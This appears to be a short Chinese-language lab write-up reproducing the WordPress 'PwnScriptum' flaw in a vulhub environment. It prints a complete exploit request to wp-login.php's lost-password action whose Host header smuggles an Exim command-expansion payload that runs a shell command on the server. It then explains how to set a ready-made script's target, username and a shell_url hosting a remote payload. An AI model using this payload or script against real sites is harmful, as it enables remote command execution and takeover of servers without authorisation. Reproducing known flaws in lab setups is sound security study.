漏洞详细
详细务必请看:https://github.com/vulhub/vulhub/blob/master/wordpress/pwnscriptum/README.zh-cn.md
漏洞复现
发送如下数据包,可见/tmp/success
已经成功创建:
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Accept: */*
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
wp-submit=Get+New+Password&redirect_to=&user_login=admin
有关于payload的详细务必请看以上文章链接!
自行利用相对麻烦,所以作者也是很贴心的写了个脚本以供我们使用!
将脚本中target
修改成你的目标,user
修改成一个已经存在的用户,shell_url
修改成你放置payload的网址。
如果利用失败,请多看看链接文章中的坑!